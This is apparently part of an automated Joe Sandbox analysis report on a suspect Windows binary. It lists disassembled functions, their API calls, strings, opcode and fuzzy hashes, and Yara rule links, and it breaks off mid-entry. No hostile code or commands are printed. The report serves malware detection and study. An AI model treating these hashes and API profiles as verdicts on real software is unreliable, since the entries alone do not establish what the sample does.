                                                  • Opcode ID: bf032bc96bb8e215b6ebaadf8e9b1333cecfd0603b61d536c68ea90259849b6c
                                                  • Instruction ID: 6e33beed37e3f6c9fc2b0e851fefebfc418101e15bcd436a89a76c6c6284c1b1
                                                  • Opcode Fuzzy Hash: bf032bc96bb8e215b6ebaadf8e9b1333cecfd0603b61d536c68ea90259849b6c
                                                  • Instruction Fuzzy Hash: 9D318E32518215AFDF219FA4DC58FDA3B6DFF09364F104224FA15A60E0C731E921EBA4
                                                  Function 008A7040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 008A707B
                                                    • Part of subcall function 008A8D68: __getptd_noexit.LIBCMT ref: 008A8D68
                                                  • __gmtime64_s.LIBCMT ref: 008A7114
                                                  • __gmtime64_s.LIBCMT ref: 008A714A
                                                  • __gmtime64_s.LIBCMT ref: 008A7167
                                                  • __allrem.LIBCMT ref: 008A71BD
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008A71D9
                                                  • __allrem.LIBCMT ref: 008A71F0
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008A720E
                                                  • __allrem.LIBCMT ref: 008A7225
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008A7243
                                                  • __invoke_watson.LIBCMT ref: 008A72B4
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                  • String ID:
                                                  • API String ID: 384356119-0
                                                  • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                  • Instruction ID: f471124ecaf99171a2550d2bda1bdce1e35846dafc02eb41860f655ebfdb28f9
                                                  • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                  • Instruction Fuzzy Hash: F071C771A04B16ABF7149E7DCC42BAAB3A8FF12324F14423AF515E7B81E770E9409791
                                                  Function 008E2A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 008E2A31
                                                  • GetMenuItemInfoW.USER32(00946890,000000FF,00000000,00000030), ref: 008E2A92
                                                  • SetMenuItemInfoW.USER32(00946890,00000004,00000000,00000030), ref: 008E2AC8
                                                  • Sleep.KERNEL32(000001F4), ref: 008E2ADA
                                                  • GetMenuItemCount.USER32(?), ref: 008E2B1E
                                                  • GetMenuItemID.USER32(?,00000000), ref: 008E2B3A
                                                  • GetMenuItemID.USER32(?,-00000001), ref: 008E2B64
                                                  • GetMenuItemID.USER32(?,?), ref: 008E2BA9
                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 008E2BEF
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008E2C03
                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008E2C24
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                  • String ID:
                                                  • API String ID: 4176008265-0
                                                  • Opcode ID: 4ad48f32ac953670daaeaf602863db4332d88108d4ba705727a636d73e2c6be0
                                                  • Instruction ID: d5112a5ee3ea39cd1cd44699589949e5ecf925adbe846af733b3072632623b9b
                                                  • Opcode Fuzzy Hash: 4ad48f32ac953670daaeaf602863db4332d88108d4ba705727a636d73e2c6be0
                                                  • Instruction Fuzzy Hash: DA617BB0914289AFDB21CF65CC88EAE7BBCFB42314F140569E841E3251D771AE45EB21
                                                  Function 00907192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00907214
                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00907217
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0090723B
                                                  • _memset.LIBCMT ref: 0090724C
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0090725E
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 009072D6
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$LongWindow_memset
                                                  • String ID:
                                                  • API String ID: 830647256-0
                                                  • Opcode ID: 3d7dfe658f40754c27da95923f327ce658d8723feaa815cadb94f4e05d53cf6b
                                                  • Instruction ID: e6b6130be04ddebd3909d8a120709c0ecb6c212a5acd6819652d23f7c0782652
                                                  • Opcode Fuzzy Hash: 3d7dfe658f40754c27da95923f327ce658d8723feaa815cadb94f4e05d53cf6b
                                                  • Instruction Fuzzy Hash: F5616BB5904208AFDB20DFA4CC81EEEB7F8EB09710F140159FA14E72E1D774A945DB60
                                                  Function 008D710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 008D7135
                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 008D718E
                                                  • VariantInit.OLEAUT32(?), ref: 008D71A0
                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 008D71C0
                                                  • VariantCopy.OLEAUT32(?,?), ref: 008D7213
                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 008D7227
                                                  • VariantClear.OLEAUT32(?), ref: 008D723C
                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 008D7249
                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008D7252
                                                  • VariantClear.OLEAUT32(?), ref: 008D7264
                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008D726F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                  • String ID:
                                                  • API String ID: 2706829360-0
                                                  • Opcode ID: 4783f0394abaace50dc6045631a93b97ef5c4f87007e5668d89877617cd2e545
                                                  • Instruction ID: d87fa5867b27f14c88e9e6debffdb103b8eb5a2f20a644a9b034fdb87cfb9457
                                                  • Opcode Fuzzy Hash: 4783f0394abaace50dc6045631a93b97ef5c4f87007e5668d89877617cd2e545
                                                  • Instruction Fuzzy Hash: 234163319042199FCF10DFA8D898DAEBBB9FF08354F008166F956E7361DB30AA45CB91
                                                  Function 008F5A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WSAStartup.WS2_32(00000101,?), ref: 008F5AA6
                                                  • inet_addr.WS2_32(?), ref: 008F5AEB
                                                  • gethostbyname.WS2_32(?), ref: 008F5AF7
                                                  • IcmpCreateFile.IPHLPAPI ref: 008F5B05
                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 008F5B75
                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 008F5B8B
                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 008F5C00
                                                  • WSACleanup.WS2_32 ref: 008F5C06
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                  • String ID: Ping
                                                  • API String ID: 1028309954-2246546115
                                                  • Opcode ID: e7dd1f8ef9eaddd9b595b40395644a7f1a123b6ddb8bfbb966e80b995d8a44f8
                                                  • Instruction ID: 5dc7f4b63e8272bf8c0498806164b4b5ae6d3f04d8588239c6f1d93d4b0ed838
                                                  • Opcode Fuzzy Hash: e7dd1f8ef9eaddd9b595b40395644a7f1a123b6ddb8bfbb966e80b995d8a44f8
                                                  • Instruction Fuzzy Hash: FE518F316047049FD720AF24CC59B3AB7E4FF48720F148929F696DB2A1DB70E9009B42
                                                  Function 008EB72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 008EB73B
                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 008EB7B1
                                                  • GetLastError.KERNEL32 ref: 008EB7BB
                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 008EB828
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                  • API String ID: 4194297153-14809454
                                                  • Opcode ID: b397a285e262d3db3f3fe3a5608976eb9f67ffbc716ee6a325dac87b3a4eeb7e
                                                  • Instruction ID: 00a4c44529710d16c2b558d98fad583b4c5e3409b28803a022c671fb396f90fb
                                                  • Opcode Fuzzy Hash: b397a285e262d3db3f3fe3a5608976eb9f67ffbc716ee6a325dac87b3a4eeb7e
                                                  • Instruction Fuzzy Hash: 8931C435A00248AFDB10EF69CC85ABF7BB4FF8A754F144029E541D7291DB719E42CB51
                                                  Function 008D9471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                                    • Part of subcall function 008DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 008DB0E7
                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 008D94F6
                                                  • GetDlgCtrlID.USER32 ref: 008D9501
                                                  • GetParent.USER32 ref: 008D951D
                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 008D9520
                                                  • GetDlgCtrlID.USER32(?), ref: 008D9529
                                                  • GetParent.USER32(?), ref: 008D9545
                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 008D9548
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 1536045017-1403004172
                                                  • Opcode ID: a4d6ca88bf7eaf9a977470965fb6f6a41a5a428198b83eca00724cd7f0482efa
                                                  • Instruction ID: 6a5a75792bf2588004e7708a4034939a358a191508e9667f41ee096aa312bac7
                                                  • Opcode Fuzzy Hash: a4d6ca88bf7eaf9a977470965fb6f6a41a5a428198b83eca00724cd7f0482efa
                                                  • Instruction Fuzzy Hash: 5321B075904208AFCF05AF64CC95EFEBBB5FF49310F10022AF961972A2DB7599199B20
                                                  Function 008D955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                                    • Part of subcall function 008DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 008DB0E7
                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 008D95DF
                                                  • GetDlgCtrlID.USER32 ref: 008D95EA
                                                  • GetParent.USER32 ref: 008D9606
                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 008D9609
                                                  • GetDlgCtrlID.USER32(?), ref: 008D9612
                                                  • GetParent.USER32(?), ref: 008D962E
                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 008D9631
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 1536045017-1403004172
                                                  • Opcode ID: 1204e2100e87361eda5c727108b593bca3f0fe439edf05ca0b7b125b08a3d63e
                                                  • Instruction ID: afdf39119a09edbed9e2562d2a1b325d52e587bdb5b364c5e797ad55fc36fccb
                                                  • Opcode Fuzzy Hash: 1204e2100e87361eda5c727108b593bca3f0fe439edf05ca0b7b125b08a3d63e
                                                  • Instruction Fuzzy Hash: 1721A175900208BFDF15AB64CC95EFEBBB8FF58300F100216F951D72A1DB7599199B21
                                                  Function 008D9645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetParent.USER32 ref: 008D9651
                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 008D9666
                                                  • _wcscmp.LIBCMT ref: 008D9678
                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 008D96F3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                  • API String ID: 1704125052-3381328864
                                                  • Opcode ID: ff10ad032c1395c886152eb5fda9a918f69e6ef9fbf7ea0293021966480ffae1
                                                  • Instruction ID: c65918f3e0a9594de0809639e78f1b3661dcbf9adfeec127ed049cff0da6e6fa
                                                  • Opcode Fuzzy Hash: ff10ad032c1395c886152eb5fda9a918f69e6ef9fbf7ea0293021966480ffae1
                                                  • Instruction Fuzzy Hash: 2C113A37248307BAFA112624EC06DA6779CEB11328F200227FD00E15D1FE92E9415A49
                                                  Function 008F8BC0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 008F8BEC
                                                  • CoInitialize.OLE32(00000000), ref: 008F8C19
                                                  • CoUninitialize.OLE32 ref: 008F8C23
                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 008F8D23
                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 008F8E50
                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00912C0C), ref: 008F8E84
                                                  • CoGetObject.OLE32(?,00000000,00912C0C,?), ref: 008F8EA7
                                                  • SetErrorMode.KERNEL32(00000000), ref: 008F8EBA
                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 008F8F3A
                                                  • VariantClear.OLEAUT32(?), ref: 008F8F4A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                  • String ID:
                                                  • API String ID: 2395222682-0
                                                  • Opcode ID: b88a9ee749d8f6a40391a2b6e5c8c3e18991192018a65c30e356f90ce9a5de89
                                                  • Instruction ID: b3d0c2cae04e20e4fbef0a617bf453e1b1a94d699624383e03120f0be2a84e6e
                                                  • Opcode Fuzzy Hash: b88a9ee749d8f6a40391a2b6e5c8c3e18991192018a65c30e356f90ce9a5de89
                                                  • Instruction Fuzzy Hash: 75C1E071208309AFD700EF68C88496AB7E9FF89748F04495DFA8ADB251DB71ED05CB52
                                                  Function 008E4189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __swprintf.LIBCMT ref: 008E419D
                                                  • __swprintf.LIBCMT ref: 008E41AA
                                                    • Part of subcall function 008A38D8: __woutput_l.LIBCMT ref: 008A3931
                                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 008E41D4
                                                  • LoadResource.KERNEL32(?,00000000), ref: 008E41E0
                                                  • LockResource.KERNEL32(00000000), ref: 008E41ED
                                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 008E420D
                                                  • LoadResource.KERNEL32(?,00000000), ref: 008E421F
                                                  • SizeofResource.KERNEL32(?,00000000), ref: 008E422E
                                                  • LockResource.KERNEL32(?), ref: 008E423A
                                                  • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 008E429B
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                  • String ID:
                                                  • API String ID: 1433390588-0
                                                  • Opcode ID: b827bf46754e880cc0f87fd10026416a0c81cabe13d337f45baff60c98296ba3
                                                  • Instruction ID: 45a0c5cea0a4917b7c5aced80bf63654cc5ec8f479f4965402c35acce244c1d6
                                                  • Opcode Fuzzy Hash: b827bf46754e880cc0f87fd10026416a0c81cabe13d337f45baff60c98296ba3
                                                  • Instruction Fuzzy Hash: 2C31EF71A0924AAFDB109FA1DC58EBF7BACFF0A301F004425FA19D6550E730DA11EBA0
                                                  Function 008E16DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,008E0778,?,00000001), ref: 008E1700
                                                  • GetForegroundWindow.USER32 ref: 008E1714
                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 008E171B
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 008E172A
                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 008E173C
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 008E1755
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 008E1767
                                                  • AttachThreadInput.USER32(00000000,00000000), ref: 008E17AC
                                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 008E17C1
                                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 008E17CC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
